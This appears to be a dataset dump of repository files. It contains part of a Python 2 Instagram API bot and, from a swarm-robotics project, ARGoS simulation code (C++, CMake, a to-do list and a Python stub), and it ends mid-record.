'GET request url : %s' % (request_url)\n # Hitting the url and using the json function to decode the object and storing it in own_media\n own_media = requests.get(request_url).json()\n # Checking if the status code is 200 i.e success\n if own_media['meta']['code'] == 200:\n # Check if the data exists in the json object\n if len(own_media['data']):\n # Using the urllib to download the most recent post\n image_name = own_media['data'][0]['id'] + '.jpeg'\n image_url = own_media['data'][0]['images']['standard_resolution']['url']\n urllib.urlretrieve(image_url, image_name)\n print 'Your image has been downloaded!'\n # If there is no recent post then printing the message\n else:\n print 'Post does not exist!'\n # Printing an appropriate message if the status code other than 200 is received\n else:\n print 'Status code other than 200 received!'\n return None\n\n# Function to get the most recent post of the instagram user\ndef get_user_post(insta_username):\n # Using get user id function to get the user id of the user\n user_id = get_user_id(insta_username)\n # If no user id with such username exists then printing appropriate message\n if user_id == None:\n print 'User does not exist!'\n exit()\n # Otherwise formalise the request url using the instagram API and attaching the access token with it\n request_url = (base+ 'users/%s/media/recent/?access_token=%s') % (user_id, app_access_token)\n print 'GET request url : %s' % (request_url)\n # Hitting the url and using the json function to decode the object and storing it in user_info\n user_media = requests.get(request_url).json()\n # Checking if the status code is 200 i.e success\n if user_media['meta']['code'] == 200:\n # Check if the data exists in the json object\n if len(user_media['data']):\n # Using the urllib to download the most recent post\n image_name = user_media['data'][0]['id'] + '.jpeg'\n image_url = user_media['data'][0]['images']['standard_resolution']['url']\n urllib.urlretrieve(image_url, image_name)\n print 'Your image has been downloaded!'\n # If there is no recent post then printing the message\n else:\n print \"There is no recent post!\"\n # Printing an appropriate message if the status code other than 200 is received\n else:\n print \"Status code other than 200 received!\"\n return None\n\n# Function to get the most recent liked pic\ndef get_own_likes():\n # Formalise the request url using the instagram API and attaching the access token with it\n request_url = (base + 'users/self/media/liked?access_token=%s') % (app_access_token)\n print 'GET request url : %s' % (request_url)\n # Hitting the url and using the json function to decode the object and storing it in own_media\n own_media = requests.get(request_url).json()\n # Checking if the status code is 200 i.e success\n if own_media['meta']['code'] == 200:\n # Check if the data exists in the json object\n if len(own_media['data']):\n # Printing the id of the most recently liked media\n print 'id '+own_media['data'][0]['user']['id']\n print 'url ' + own_media['data'][1]['images']['thumbnail']['url']\n # Using the urllib to download the most recent post\n image_name = own_media['data'][0]['id'] + '.jpeg'\n image_url = own_media['data'][0]['images']['standard_resolution']['url']\n urllib.urlretrieve(image_url, image_name)\n print 'Your image has been downloaded!'\n # If there is no recent post then printing the message\n else:\n print \"There is no recent post!\"\n # Printing an appropriate message if the status code other than 200 is received\n else:\n print \"Status code other than 200 received!\"\n\n# Function to get the post id for a post by the instagram user\ndef get_post_id(insta_username):\n # Using get user id function to get the user id of the user\n user_id = get_user_id(insta_username)\n # Formalise the request url using the instagram API and attaching the access token with it\n request_url = (base + 'users/%s/media/recent/?access_token=%s') % (user_id, app_access_token)\n # Hitting the url and using the json function to decode the object and storing it in media variable\n media = requests.get(request_url).json()\n # Checking if the status code is 200 i.e success\n if media['meta']['code'] == 200:\n # Check if the data exists in the json object\n if len(media['data']):\n return media['data'][0]['id']\n # If media object contains no data then printing the message\n else:\n print 'There is no such post id!'\n # Printing an appropriate message if the status code other than 200 is received\n else:\n print'Status code other than 200 received'\n\n# Function to post a like on the post of a intagram user\ndef like_a_post(insta_username):\n # Using get media id function to get the user of the user\n media_id = get_post_id(insta_username)\n # Formalise the request url using the instagram API\n request_url = (base+'media/%s/likes') %(media_id)\n # Making a payload variable to be attached with the url\n payload = {\"access_token\": app_access_token}\n print 'POST request url : %s' % (request_url)\n # Hitting the url and using the json function to decode the object and storing it in post_a_like object\n post_a_like = requests.post(request_url, payload).json()\n # Checking if the status code is 200 i.e success\n if post_a_like['meta']['code'] == 200:\n print 'Like was successful!'\n # Printing an appropriate message if the status code other than 200 is received\n else:\n print 'Your like was unsuccessful. Try again!'\n\n# Function to comments on the post of a intagram user\ndef get_comments_on_post(insta_username):\n # Using get media id function to get the user of the user\n media_id = get_post_id(insta_username)\n # Formalise the request url using the instagram API and attaching the access token with it\n request_url = (base + 'media/%s/comments/?access_token=%s') % (media_id, app_access_token)\n print ('GET request url: %s') % (request_url)\n # Hitting the url and using the json function to decode the object and storing it in comments_info object\n comments_info = requests.get(request_url).json()\n # Checking if the status code is 200 i.e success\n if comments_info['meta']['code'] == 200:\n # Check if the data exists in the json object\n if len(comments_info['data']):\n print 'All the comments have been properly fetched!'\n print 'Comments are as follows'\n # Using the for loop to print the comments on the post\n for index,val in enumerate(comments_info['data']):\n print comments_info['data'][index]['text']\n return comments_info\n # If media object contains no data then printing the message\n else:\n print 'There is no comments on the post'\n # Printing an appropriate message if the status code other than 200 is received\n else:\n print 'There was some error in fetching of the comments please try again!'\n\n# Function to post a comment on the post of a intagram user\ndef post_a_comment(insta_username):\n # Using get media id function to get the user of the user\n media_id = get_post_id(insta_username)\n # Formalise the request url using the instagram API and attaching the access token with it\n request_url = (base+'media/%s/comments') %(media_id)\n # Making a payload variable to be attached with the url\n payload = {\"access_token\": app_access_token, \"text\": 'test'}\n print 'POST request url : %s' %(request_url)\n # Hitting the url and using the json function to decode the object and storing it in post_comment\n post_comment = requests.post(request_url,payload).json()\n # Checking if the status code is 200 i.e success\n if post_comment['meta']['code'] == 200:\n print 'Comment was successful!'\n # Printing an appropriate message if the status code other than 200 is received\n else:\n print 'Your comment was unsuccessful. Please try again!'\n\n# Function to analyze the comments on the post os the instagram user and deleting the comment if it is in negative sentiment\ndef delete_negative_comment(insta_username):\n # Using get media id function to get the user of the user\n media_id = get_post_id(insta_username)\n # Formalise the request url using the instagram API and attaching the access token with it\n request_url = (base + 'media/%s/comments/?access_token=%s') % (media_id, app_access_token)\n print ('GET request url: %s') %(request_url)\n # Hitting the url and using the json function to decode the object and storing it in post_comment\n comments_info = requests.get(request_url).json()\n # Checking if the status code is 200 i.e success\n if comments_info['meta']['code'] == 200 :\n # Check if the data exists in the json object\n if len(comments_info['data']):\n # using the blob library to analyze the comment\n blob = TextBlob(comments_info['data'][0]['text'],analyzer=NaiveBayesAnalyzer())\n print blob.sentiment\n print blob.sentiment[0]\n # Checking if the blob sentiment is positive or negative\n if blob.sentiment[0] == 'neg':\n comment_id = comments_info['data'][0]['id']\n print comment_id\n # Formalising the url to delete the comment\n delete_url = (base+'media/%s/comments/%s?access_token=%s') %(media_id, comment_id, app_access_token)\n # Hitting the url to delete the comment and store them in the delete_comment json object\n delete_comment = requests.delete(delete_url).json()\n # Checking if the status code is 200 i.e success\n if delete_comment['meta']['code'] == 200:\n print 'your comment was analyze to be negative and so has been deleted'\n # Printing an appropriate message if the status code other than 200 is received\n else:\n print 'your comment is negative but it was not deleted. Please try again!'\n # If media object contains no data then printing the message\n else:\n print 'There are no existing comments on this post'\n # Printing an appropriate message if the status code other than 200 is received\n else:\n print 'Status code other than 200 received'\n\n# Fuction to get user interest from the tags\ndef get_user_interests(insta_username):\n user_id = get_user_id(insta_username)\n request_url = (base+'users/%s/media/recent/?access_token=%s') %(user_id, app_access_token)\n tags_info = requests.get(request_url).json()\n if tags_info['meta']['code'] == 200:\n if len(tags_info['data']):\n print 'tags are as follows'\n tags_list = []\n yo = []\n for index,val in enumerate(tags_info['data']):\n for index1, val in enumerate(tags_info['data'][index]['tags']):\n tags_list.append(tags_info['data'][index]['tags'][index1])\n tags_list.sort()\n tags_list = [x.encode('UTF8') for x in tags_list]\n wordfreq = []\n new = []\n for w in tags_list:\n if w not in new:\n new.append(w)\n wordfreq.append(1)\n else:\n if w in new:\n b = new.index(w)\n c = wordfreq[b]\n c = c+1\n wordfreq[b] = c\n\n new = (zip(new, wordfreq))\n print new\n data = []\n for h in range(10):\n data.append(new[h])\n\n n_groups = len(data)\n\n vals_films = [x[1] for x in data]\n legends_films = [x[0] for x in data]\n\n fig, ax = plt.subplots()\n\n index = np.arange(n_groups)\n bar_width = 0.02\n\n opacity = 0.4\n\n rects1 = plt.bar(index, vals_films, bar_width,\n alpha=opacity,\n color='b',\n label='Ocurrences')\n\n plt.xlabel('Occurrences')\n plt.ylabel('Words')\n plt.title('Occurrences by word')\n plt.xticks(index + bar_width, legends_films)\n plt.legend()\n\n plt.tight_layout()\n plt.show()\n\n\n else:\n print 'There is no data in the object'\n else:\n print 'Status code other than 200 received'\n\n# Calling the start_bot function to start our application\nstart_bot()\n\n" } ]
1
turnerjrobbins/swarm-mqp
https://github.com/turnerjrobbins/swarm-mqp
9a885c1ac7fa0aa1040941a3d3c630f956b2081e
9095c76283dfcccad6fb3c78175234930a109f7d
6333d3c0cfad11c24611395e7ae44a61c0612548
refs/heads/master
2021-09-13T18:25:22.448020
2018-02-27T01:04:05
2018-02-27T01:04:05
111,338,451
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.753439724445343, "alphanum_fraction": 0.760594367980957, "avg_line_length": 61.68965530395508, "blob_id": "7db416286445180e0aa2918dbfbf742b02c2fc56", "content_id": "3ebae48741554debba6e7ffe7e913d31ee34d6ce", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 1817, "license_type": "no_license", "max_line_length": 140, "num_lines": 29, "path": "/ugv_diffusion_occupancy/todo.txt", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "initial experiment setup - DONE\n\nModify the 'pheromone' functionality to update occupancy grid\n -the SetOccupancy() function in occupancy_medium takes in a CVector2 position and needs to \n convert that to a cell, then set the occupancy for that cell (in the occupancy map).\n -the actuator needs to call the SetOccupacy function with a position during update if some flag is set to true\n -the controller needs to set the actuator flag to true if it detects a wall/obstacle and false if it sees nothing. \n\n Note: the actuator gets a reference to the CEntity it's attached to (see SetRobot function)\nso, how do we let the actuator know where to 'lay occupancy'?\ncormier uses m_pcEmbodiedEntity->GetOriginAnchor().Position to get the position of the robot, but we need the position + some offset. \n\nIdea: the actuator holds a list of positions to send to the medium (like a buffer) that the controller can fill using some exposed function.\nExample: \n\t* controller sees an object at {2,2}\n\t* controller calls actuator->objAtPosition({2,2}), which adds {2,2} to the actuator's list\n\t* during actuator's update loop the actuator calls the occupancy_medium->SetOccupancy() function with each position in its list\n\n\n\nMake KheperaIV controller w/ occupancy actuator \tDONE - 35 minutes\nMake kheperaIV experiment\t\t\t\t\t\t\tDONE - 30 minutes\nGet it to run\t\t\t\t\t\t\t\t\t\tDONE - 30 minutes (still need to either add a proximity sensor or make it use lidar for the diffusion)\nUpdate occupancy medium to keep track of occupancy\nupdate occupancy visualizer to show occupancy\n\n--------------------------OCTOMAP--------------------------\nModify the kheperaiv_occupancy_controller to call the loop function's insert ray method.\n\targos::CSimulator::GetLoopFunctions() - returns a reference to the loop functions associated to the current experiment" }, { "alpha_fraction": 0.7468643188476562, "alphanum_fraction": 0.7537057995796204, "avg_line_length": 20.414634704589844, "blob_id": "68809a8b8b3232f34f52abdcb3277dca725a0fb8", "content_id": "69bde5afe0854b8a08091ee42d7a5f4594a7c021", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 877, "license_type": "no_license", "max_line_length": 100, "num_lines": 41, "path": "/ugv_exploration/plugins/loop_functions/octomap_manager/octomap_manager.h", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "#ifndef OCTOMAP_MANAGER_H\n#define OCTOMAP_MANAGER_H\n\n#include <argos3/core/simulator/loop_functions.h>\n#include <argos3/plugins/robots/kheperaiv/simulator/kheperaiv_entity.h>\n#include <argos3/core/simulator/space/space.h>\n\n#include <octomap/octomap.h>\n#include <octomap/OcTree.h>\n\n#define OCTCELLSIZE 0.04\n\nusing namespace argos;\nusing namespace octomap;\n\nclass CLoopOctomapManager : public CLoopFunctions {\npublic:\n\t//Constructor\n\tCLoopOctomapManager() : CLoopFunctions(), m_OcMap(OcTree(OCTCELLSIZE)) {} //Argument is resolution?\n\n\t//Destructor\n\t~CLoopOctomapManager() {}\n\n\tvirtual void Init(TConfigurationNode& t_tree);\n\n\tvirtual void Reset() {}\n\n\tvirtual void Destroy() {\n\t\tm_OcMap.writeBinary(\"diffusion_tree.bt\");\n\t}\n\n\tvirtual void PreStep() {}\n\n\tvirtual void PostStep();\n\n\tvoid insertRay();\nprivate:\n\toctomap::OcTree m_OcMap;\n\tCSpace::TMapPerType m_KheperaMap;\n};\n#endif" }, { "alpha_fraction": 0.7372525334358215, "alphanum_fraction": 0.7546490430831909, "avg_line_length": 32.979591369628906, "blob_id": "4e6725e999c50cef0c50a37e67c60c4a7555a1d7", "content_id": "37370760d29412628b3ef3e354ef952caa18db7b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1667, "license_type": "no_license", "max_line_length": 91, "num_lines": 49, "path": "/pythonScripts/Stuehrmannfunctions.py", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "import numpy\nimport openCV\n\n#Function to transform UGV coords to global\n#Takes in coordinates of UAV in global frame and coordinates of UGV in UAV camera frame\ndef TransformtoGlobal(UAV_pos, UGV_pos):\n\t\n\treturn globalUGV\n#Function to filter UAV image for two points of color, find the midpoint of the\n#resultant line, and find the line orientation.\ndef ColorProcessing(cam_img, start_color, end_color):\n\tthresholded = thresholdImg(cam_img, start_color, end_color)\n\tUGV_camframepos = getMidpoint(thresholded)\n\tUGV_camframerot = getAngle(thresholded)\n\tUGV_campose = [UGV_camframepos, UGV_camframerot]\n\treturn UGV_campose\n#start_color and end_color are rgb values\ndef thresholdImg(cam_img, start_color, end_color):\n#TODO: figure out how opencv works and use it for this\n\treturn image\n\n#finds the midpoint of a line formed by 2 points in an image - used to determine where\n#the robot is in the UAV's frame of reference\ndef getMidpoint(image):\n\tcentroids = getCentroids(image)\n\tx1 = centroids[1].x\n\tx2 = centroids[2].x\n\ty1 = centroids[1].y\n\ty2 = centroids[2].y\n\txmid = abs(x1+x2)/2\n\tymid = abs(y1+y2)/2\n\txycoords = [xmid ymid]\n\treturn xycoords\n#get the centers of circles in an image and return them as xy coordinate pairs in a list\ndef getCentroids(image):\n#TODO: Figure out how opencv works and use it for this\n\treturn centroids\n#angle of line in image; shows orientation of the robot with respect to UAV reference frame\ndef getAngle(image):\n\t#make a triangle\n\tcentroids = getCentroids(image)\n\tx1 = centroids[1].x\n\tx2 = centroids[2].x\n\ty1 = centroids[1].y\n\ty2 = centroids[2].y\n\txleg = abs(x1-x2)+x1\n\tyleg = abs(y1-y2)+y1\n\tanglerot = arctan(yleg/xleg)\n\treturn anglerot\n\n\n" }, { "alpha_fraction": 0.773553729057312, "alphanum_fraction": 0.7785124182701111, "avg_line_length": 27.85714340209961, "blob_id": "bcb6663d99920683caa2c4866e4b143ddf8fd953", "content_id": "bc71794249e6d9545e7c620b7133f739489d47cc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "CMake", "length_bytes": 605, "license_type": "no_license", "max_line_length": 83, "num_lines": 21, "path": "/ugv_diffusion_occupancy/plugins/loop_functions/occupancy_visualizer/CMakeLists.txt", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "set(HEADERS\n occupancy_visualizer.h)\n\nset(SOURCES\n occupancy_visualizer.cpp)\n\ninclude_directories(../../../build)\n\nadd_library(occupancy_visualizer SHARED ${HEADERS} ${SOURCES})\n\ntarget_link_libraries(occupancy_visualizer\n argos3core_simulator\n argos3plugin_simulator_entities\n argos3plugin_simulator_qtopengl\n ${ARGOS_QTOPENGL_LIBRARIES}\n occupancy_medium)\n\ninstall(TARGETS occupancy_visualizer DESTINATION ${CMAKE_BINARY_DIR}/lib)\n\nFILE(RELATIVE_PATH relative_dir ${CMAKE_SOURCE_DIR} ${CMAKE_CURRENT_SOURCE_DIR})\ninstall(FILES ${HEADERS} DESTINATION \"${CMAKE_BINARY_DIR}/include/${relative_dir}\")" }, { "alpha_fraction": 0.7995391488075256, "alphanum_fraction": 0.7995391488075256, "avg_line_length": 35.16666793823242, "blob_id": "5fc28a8e241cb58ee7626acd6466278aed643beb", "content_id": "22bf5102de9d338d6506c4482a9fa5faafe8a521", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "CMake", "length_bytes": 434, "license_type": "no_license", "max_line_length": 80, "num_lines": 12, "path": "/ugv_exploration/plugins/controllers/kheperaiv_exploration/CMakeFiles/kheperaiv_occupancy.dir/cmake_clean.cmake", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "file(REMOVE_RECURSE\n \"kheperaiv_occupancy_automoc.cpp\"\n \"CMakeFiles/kheperaiv_occupancy.dir/kheperaiv_occupancy_controller.cpp.o\"\n \"CMakeFiles/kheperaiv_occupancy.dir/kheperaiv_occupancy_automoc.cpp.o\"\n \"libkheperaiv_occupancy.pdb\"\n \"libkheperaiv_occupancy.so\"\n)\n\n# Per-language clean rules from dependency scanning.\nforeach(lang CXX)\n include(CMakeFiles/kheperaiv_occupancy.dir/cmake_clean_${lang}.cmake OPTIONAL)\nendforeach()\n" }, { "alpha_fraction": 0.875, "alphanum_fraction": 0.875, "avg_line_length": 35.5, "blob_id": "6c494121afb9d451978d306be74efcb4009092c4", "content_id": "673474463ddc75656ee4991328801f0279f12168", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "CMake", "length_bytes": 72, "license_type": "no_license", "max_line_length": 38, "num_lines": 2, "path": "/ugv_diffusion_occupancy/plugins/loop_functions/CMakeLists.txt", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "add_subdirectory(occupancy_visualizer)\nadd_subdirectory(octomap_manager)" }, { "alpha_fraction": 0.7747440338134766, "alphanum_fraction": 0.7815699577331543, "avg_line_length": 26.952381134033203, "blob_id": "2fb53cc9ba8f3c3d3a14340b18d32e6f8ef744c7", "content_id": "17187625267699e422c55b57bc6553e17371d240", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "CMake", "length_bytes": 586, "license_type": "no_license", "max_line_length": 83, "num_lines": 21, "path": "/ugv_exploration/plugins/loop_functions/octomap_manager/CMakeLists.txt", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "set(HEADERS\n octomap_manager.h)\n\nset(SOURCES\n octomap_manager.cpp)\n\nadd_library(octomap_manager SHARED ${HEADERS} ${SOURCES})\n\ntarget_link_libraries(octomap_manager\n argos3core_simulator\n argos3plugin_simulator_entities\n argos3plugin_simulator_kheperaiv\n kheperaiv_exploration\n argos3plugin_simulator_qtopengl\n ${ARGOS_QTOPENGL_LIBRARIES}\n )\n\ninstall(TARGETS octomap_manager DESTINATION ${CMAKE_BINARY_DIR}/lib)\n\nFILE(RELATIVE_PATH relative_dir ${CMAKE_SOURCE_DIR} ${CMAKE_CURRENT_SOURCE_DIR})\ninstall(FILES ${HEADERS} DESTINATION \"${CMAKE_BINARY_DIR}/include/${relative_dir}\")" }, { "alpha_fraction": 0.7518159747123718, "alphanum_fraction": 0.7627118825912476, "avg_line_length": 26.566667556762695, "blob_id": "9d17fec0d76e48414bb276f66b7999218cc71b1a", "content_id": "1b7eb31b6249ffde85bf645fd09c3c45d4fe474a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 826, "license_type": "no_license", "max_line_length": 87, "num_lines": 30, "path": "/ugv_exploration/plugins/loop_functions/octomap_manager/octomap_manager.cpp", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "#include <argos3/core/utility/datatypes/any.h>\n\n#include <argos3/plugins/robots/kheperaiv/simulator/kheperaiv_entity.h>\n\n#include <plugins/controllers/kheperaiv_exploration/kheperaiv_exploration_controller.h>\n\n#include <argos3/plugins/robots/kheperaiv/simulator/kheperaiv_measures.h>\n\n#include \"octomap_manager.h\"\n\nvoid CLoopOctomapManager::Init (TConfigurationNode& t_tree) {\n\tm_KheperaMap = GetSpace().GetEntitiesByType(\"kheperaiv\");\n\tm_OcMap.setClampingThresMin(.1);\n\tm_OcMap.setClampingThresMax(.9);\n\tm_OcMap.setProbHit(.7);\n\tm_OcMap.setProbMiss(.3);\n\t//m_OcMap.setOccupancyThres(0.5);\n\n}\n\nvoid CLoopOctomapManager::insertRay() {\n\tstd::cout << \"\\n----insert ray called!----\" << std::endl;\n}\n\nvoid CLoopOctomapManager::PostStep() {\n}\n\n//CLoopOctomapManager::\n\nREGISTER_LOOP_FUNCTIONS(CLoopOctomapManager, \"octomap_manager\")" }, { "alpha_fraction": 0.5322874784469604, "alphanum_fraction": 0.5370302796363831, "avg_line_length": 30.159090042114258, "blob_id": "3a524e79f9ca0f8c17a44230d9181facce1799ca", "content_id": "1b350e4f666ef0d64e3ed2e332e1c8c7a0d240a7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2741, "license_type": "no_license", "max_line_length": 97, "num_lines": 88, "path": "/ugv_diffusion_occupancy/plugins/robots/generic/simulator/occupancy_default_actuator.cpp", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "#include <string>\n#include <map>\n\n#include \"occupancy_default_actuator.h\"\n#include <argos3/core/simulator/simulator.h>\n\n/****************************************/\n/****************************************/\n\nvoid COccupancyActuator::SetRobot(CComposableEntity& c_entity){\n m_pcEmbodiedEntity = &(c_entity.GetComponent<CEmbodiedEntity>(\"body\"));\n}\n\n/****************************************/\n/****************************************/\n\nvoid COccupancyActuator::Init(TConfigurationNode& t_tree){\n try {\n /* Parent class init */\n CCI_OccupancyActuator::Init(t_tree);\n /* Get pheromone medium from id specified in the XML */\n std::string strMedium;\n GetNodeAttribute(t_tree, \"medium\", strMedium);\n m_pCOccupancyMedium = &(CSimulator::GetInstance().GetMedium<COccupancyMedium>(strMedium));\n }\n catch(CARGoSException& ex) {\n THROW_ARGOSEXCEPTION_NESTED(\"Error initializing the range and bearing medium sensor\", ex);\n }\n}\n\n/****************************************/\n/****************************************/\n\nvoid COccupancyActuator::Update(){\n auto size = m_occupancy_list.size();\n for(int i = 0; i < size; i++) {\n m_pCOccupancyMedium->SetOccupancy(m_occupancy_list.front());\n m_occupancy_list.pop_front();\n } \n}\n\nvoid COccupancyActuator::SetOccupancy(Real dist) {\n LOG << \"Setting occupancy for \" + std::to_string(dist) << std::endl;\n //Get the position wrt the global frame\n CVector3 global_robot_location = m_pcEmbodiedEntity->GetOriginAnchor().Position;\n //Get the orientation\n CQuaternion global_robot_orientation = m_pcEmbodiedEntity->GetOriginAnchor().Orientation;\n\n //Make a vector in the x direction\n CVector3 local_vec = CVector3(dist, 0.0, 0.0);\n //rotate it by the quaternion\n local_vec.Rotate(global_robot_orientation);\n\n //add the two vectors together to get the location of the object\n global_robot_location += local_vec;\n\n //Make it twoD\n CVector2 obj_location = CVector2(global_robot_location.GetX(), global_robot_location.GetY());\n\n LOG << obj_location<< std::endl;\n m_occupancy_list.push_front(obj_location);\n}\n\n/****************************************/\n/****************************************/\n\nvoid COccupancyActuator::Reset(){\n bLayingPheromone = false;\n}\n\n/****************************************/\n/****************************************/\n\nvoid COccupancyActuator::Destroy(){\n\n}\n\n/****************************************/\n/****************************************/\n\nREGISTER_ACTUATOR(COccupancyActuator,\n \"occupancy\", \"default\",\n \"Chris Cormier [[email protected]]\",\n \"0.1\",\n \"A generic occupancy actuator.\",\n \"\",\n \"\"\n);" }, { "alpha_fraction": 0.8167388439178467, "alphanum_fraction": 0.8282828330993652, "avg_line_length": 52.30769348144531, "blob_id": "f335ce536db773d796e22317d81d0a006d336725", "content_id": "849c19a6cb3a8397ffd7490c57082c4fda19e673", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "CMake", "length_bytes": 693, "license_type": "no_license", "max_line_length": 114, "num_lines": 13, "path": "/ugv_exploration/plugins/robots/generic/CMakeFiles/argos3plugin_simulator_generic_occupancy.dir/cmake_clean.cmake", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "file(REMOVE_RECURSE\n \"argos3plugin_simulator_generic_occupancy_automoc.cpp\"\n \"CMakeFiles/argos3plugin_simulator_generic_occupancy.dir/control_interface/ci_occupancy_actuator.cpp.o\"\n \"CMakeFiles/argos3plugin_simulator_generic_occupancy.dir/simulator/occupancy_default_actuator.cpp.o\"\n \"CMakeFiles/argos3plugin_simulator_generic_occupancy.dir/argos3plugin_simulator_generic_occupancy_automoc.cpp.o\"\n \"libargos3plugin_simulator_generic_occupancy.pdb\"\n \"libargos3plugin_simulator_generic_occupancy.so\"\n)\n\n# Per-language clean rules from dependency scanning.\nforeach(lang CXX)\n include(CMakeFiles/argos3plugin_simulator_generic_occupancy.dir/cmake_clean_${lang}.cmake OPTIONAL)\nendforeach()\n" }, { "alpha_fraction": 0.8263305425643921, "alphanum_fraction": 0.8347339034080505, "avg_line_length": 43.75, "blob_id": "7b05d6194ad2a961d880ee81e6a577fc667cf928", "content_id": "57d76fc71b59e4c8cdf5f37ea6235fe7d6852caa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "CMake", "length_bytes": 357, "license_type": "no_license", "max_line_length": 82, "num_lines": 8, "path": "/obstexample/plugins/CMakeLists.txt", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "add_library(footbot_diffusion_cp SHARED footbot_diffusion.h footbot_diffusion.cpp)\n\n#install(TARGETS file_name DESTINATION ${CMAKE_BINARY_DIR}/dest_file_directory)\n#destination file is relative to cmake binary directory\ntarget_link_libraries(footbot_diffusion_cp\n argos3core_simulator\n argos3plugin_simulator_footbot\n argos3plugin_simulator_genericrobot)" }, { "alpha_fraction": 0.8059701323509216, "alphanum_fraction": 0.8149253726005554, "avg_line_length": 36.22222137451172, "blob_id": "4304dafa04240fd541663e891a29f93fe790735d", "content_id": "029065f5e4b3fca6f4bd846fcc4de0ba36e85c9e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "CMake", "length_bytes": 335, "license_type": "no_license", "max_line_length": 109, "num_lines": 9, "path": "/ugv_exploration/plugins/robots/generic/CMakeFiles/argos3plugin_simulator_generic_occupancy_automoc.dir/cmake_clean.cmake", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "file(REMOVE_RECURSE\n \"argos3plugin_simulator_generic_occupancy_automoc.cpp\"\n \"CMakeFiles/argos3plugin_simulator_generic_occupancy_automoc\"\n)\n\n# Per-language clean rules from dependency scanning.\nforeach(lang )\n include(CMakeFiles/argos3plugin_simulator_generic_occupancy_automoc.dir/cmake_clean_${lang}.cmake OPTIONAL)\nendforeach()\n" }, { "alpha_fraction": 0.7533086538314819, "alphanum_fraction": 0.7623081207275391, "avg_line_length": 26.376811981201172, "blob_id": "7778cba62f45adcf9d9b270890613ea5d38db833", "content_id": "1e4e99bc5d375d194182a63b31b72ca955228951", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "CMake", "length_bytes": 1889, "license_type": "no_license", "max_line_length": 78, "num_lines": 69, "path": "/obstexample/CMakeLists.txt", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "cmake_minimum_required (VERSION 2.6)\n\nproject (obstacle_avoidance)\n\nset(CMAKE_MODULE_PATH ${CMAKE_MODULE_PATH} ${CMAKE_SOURCE_DIR}/cmake)\n\n# Deactivate RPATH for MacOSX\nset(CMAKE_MACOSX_RPATH 0)\n\nset(Lua52_DIR)\nfind_package(Lua52)\nif(LUA52_FOUND)\n set(ARGOS_WITH_LUA ON)\n include_directories(${LUA_INCLUDE_DIR})\nendif(LUA52_FOUND)\n\n#\n# Check for ARGoS3\n#\n# Find the ARGoS package, make sure to save the ARGoS prefix\nfind_package(PkgConfig)\npkg_check_modules(ARGOS REQUIRED argos3_simulator)\nset(ARGOS_PREFIX ${ARGOS_PREFIX} CACHE INTERNAL \"\")\nset(CMAKE_MODULE_PATH ${CMAKE_MODULE_PATH} ${ARGOS_PREFIX}/share/argos3/cmake)\n# Set ARGoS include dir\ninclude_directories(${ARGOS_INCLUDE_DIRS})\n# Set ARGoS link dir\nlink_directories(${ARGOS_LIBRARY_DIRS})\n\n# Check whether all the necessary libs have been installed to compile the\n# code that depends on Qt and OpenGL\ninclude(ARGoSCheckQTOpenGL)\n\n#\n# Add repository directory to the list of includes\n# This makes it possible to say #include <argos3/...> with\n# repository includes.\n#\ninclude_directories(${CMAKE_SOURCE_DIR})\n\n# add buzz to the module path\n# set(CMAKE_MODULE_PATH ${CMAKE_MODULE_PATH} /usr/local/share/buzz/cmake)\n\n# Look for Buzz tools, libraries, and headers\nfind_package(Buzz)\nif(BUZZ_FOUND)\n # Define Buzz-related commands\n include(UseBuzz)\n include_directories(${BUZZ_C_INCLUDE_DIR})\nendif(BUZZ_FOUND)\n\n# use, i.e. don't skip the full RPATH for the build tree\nset(CMAKE_SKIP_BUILD_RPATH FALSE)\n\n# when building, don't use the install RPATH already\n# (but later on when installing)\nset(CMAKE_BUILD_WITH_INSTALL_RPATH FALSE)\n\n# add the automatically determined parts of the RPATH\n# which point to directories outside the build tree to the install RPATH\nset(CMAKE_INSTALL_RPATH_USE_LINK_PATH TRUE)\n\n\nset(CMAKE_CXX_STANDARD 11)\nset(CMAKE_CXX_STANDARD_REQUIRED ON)\n\nadd_subdirectory(plugins)\n\nset(CMAKE_CXX_EXTENSIONS OFF)\n" }, { "alpha_fraction": 0.7344398498535156, "alphanum_fraction": 0.7468879818916321, "avg_line_length": 25.88888931274414, "blob_id": "112497dd1710d68ae277777574232f78b0885ca7", "content_id": "fdf400c203fcf1498bb1d11261ca62f85ae8f570", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 241, "license_type": "no_license", "max_line_length": 74, "num_lines": 9, "path": "/ugv_diffusion_occupancy/plugins/robots/generic/control_interface/ci_occupancy_actuator.cpp", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "#include 